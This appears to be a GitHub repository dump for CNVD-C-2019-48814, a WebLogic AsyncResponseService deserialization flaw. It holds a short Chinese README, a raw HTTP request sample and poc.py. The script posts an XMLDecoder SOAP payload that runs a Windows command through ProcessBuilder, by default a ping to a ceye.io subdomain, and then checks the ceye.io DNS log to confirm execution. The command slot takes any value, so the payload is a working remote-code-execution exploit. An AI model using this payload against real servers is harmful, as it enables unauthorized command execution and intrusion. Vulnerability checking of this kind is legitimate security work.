├── 1.png
├── 2.png
├── CNVD-C-2019-48814.xml
├── README.md
├── poc_sample1.txt
└── poc.py


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/greekn/CNVD-C-2019-48814/HEAD/1.png


--------------------------------------------------------------------------------
/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/greekn/CNVD-C-2019-48814/HEAD/2.png


--------------------------------------------------------------------------------
/CNVD-C-2019-48814.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/greekn/CNVD-C-2019-48814/HEAD/CNVD-C-2019-48814.xml


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CNVD-C-2019-48814
 2 | 
 3 | POC 检测脚本说明：这个poc脚本是直接执行命令不会回显的所以使用ceye 接口进行漏洞检测
 4 | 
 5 | 默认进行的触发是 dns 加ping 所以需要加标识符，通过ceyeapi返回的数据进行判断。
 6 | 
 7 | usage： poc.py http://192.168.237.128:7001 tag123
 8 | 
 9 | ![image](https://github.com/greekn/CNVD-C-2019-48814/blob/master/1.png)
10 | 
11 | ![image](https://github.com/greekn/CNVD-C-2019-48814/blob/master/2.png)
12 | 


--------------------------------------------------------------------------------
/poc_sample1.txt:
--------------------------------------------------------------------------------
 1 | burpsuite request raw
 2 | 
 3 | POST /_async/AsyncResponseService HTTP/1.1
 4 | Host: xxx.xxx.xxx.xxx:7001
 5 | Content-Length: 677
 6 | Accept-Encoding: gzip, deflate
 7 | SOAPAction: 
 8 | Accept: */*
 9 | User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
10 | Connection: keep-alive
11 | content-type: text/xml
12 | 
13 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string><void><string>xx</string></void></class></java>    </work:WorkContext>   </soapenv:Header>   <soapenv:Body>      <asy:onAsyncDelivery/>   </soapenv:Body></soapenv:Envelope>
14 | 
15 | 
16 | 返回响应包
17 | 
18 | HTTP/1.1 202 Accepted
19 | Date: Mon, 22 Apr 2019 11:06:18 GMT
20 | Content-Length: 0
21 | X-Powered-By: Servlet/2.5 JSP/2.1
22 | 
23 | 


--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import requests
 4 | import sys
 5 | 
 6 | 
 7 | print """
 8 |   ____ _   ___     ______         ____     ____   ___  _  ___        _  _    ___   ___  _ _  _   
 9 |  / ___| \ | \ \   / /  _ \       / ___|   |___ \ / _ \/ |/ _ \      | || |  ( _ ) ( _ )/ | || |  
10 | | |   |  \| |\ \ / /| | | |_____| |   _____ __) | | | | | (_) |_____| || |_ / _ \ / _ \| | || |_ 
11 | | |___| |\  | \ V / | |_| |_____| |__|_____/ __/| |_| | |\__, |_____|__   _| (_) | (_) | |__   _|
12 |  \____|_| \_|  \_/  |____/       \____|   |_____|\___/|_|  /_/         |_|  \___/ \___/|_|  |_|  
13 |                                                                                                   
14 |                                                                           2019-4-25 By Greekn
15 | """
16 | 
17 | 
18 | def poc():
19 | 	url =str(sys.argv[1])
20 | 	tag =str(sys.argv[2])
21 | 	ceyecommand = "ping"  
22 | 	ceyeurl = "xxx.ceye.io"
23 | 	#ydueru.ceye.io
24 | 	path ="/_async/AsyncResponseService"
25 | 	#AsyncResponseServiceHttps
26 | 	#AsyncResponseServiceJms
27 | 	
28 | 	
29 | 	headers = {
30 |     'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
31 |     'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
32 |     'Content-Type': "text/xml"
33 |     
34 |     }
35 | 
36 | 	payload = """
37 | 	<?xml version="1.0" encoding="Utf-8"?>
38 | 	<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
39 | 		<soapenv:Header>
40 | 			<wsa:Action>xx</wsa:Action>
41 | 			<wsa:RelatesTo>xx</wsa:RelatesTo>
42 | 			<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
43 | 				<java version="1.8.0_131" class="java.beans.xmlDecoder">
44 | 					<void class="java.lang.ProcessBuilder">
45 | 						<array class="java.lang.String" length="3">
46 | 							<void index="0">
47 | 								<string>cmd</string>
48 | 							</void>
49 | 							<void index="1">
50 | 								<string>/c</string>
51 | 							</void>
52 | 							<void index="2">
53 | 								<string>{cmd_command}</string>
54 | 							</void>
55 | 						</array>
56 | 						<void method="start"/>
57 | 					</void>
58 | 				</java>
59 | 			</work:WorkContext>
60 | 		</soapenv:Header>
61 | 		<soapenv:Body>
62 | 			<asy:onAsyncDelivery/>
63 | 		</soapenv:Body>
64 | 	</soapenv:Envelope>
65 | 	"""
66 | 	
67 | 	payload=payload.format(cmd_command=ceyecommand+" "+tag+"."+ceyeurl)
68 | 	try:
69 | 		request = requests.post(url+path,data=payload,headers=headers)
70 | 		print request.headers
71 | 		if request.status_code == 202:
72 | 			print '[+] %s  Data transmission success!' % url
73 | 			cyeyapi = "http://api.ceye.io/v1/records?token=xxx&type=dns&filter="+tag
74 | 			cyey= requests.get(cyeyapi)
75 | 			print cyey.text
76 | 		else:
77 | 			print '[-] %s  Data transmission failed!' % url
78 | 	except:
79 | 		print '[-] %s  Address cannot be accessed!' % url
80 | 
81 | if __name__=='__main__':
82 | 		poc()


--------------------------------------------------------------------------------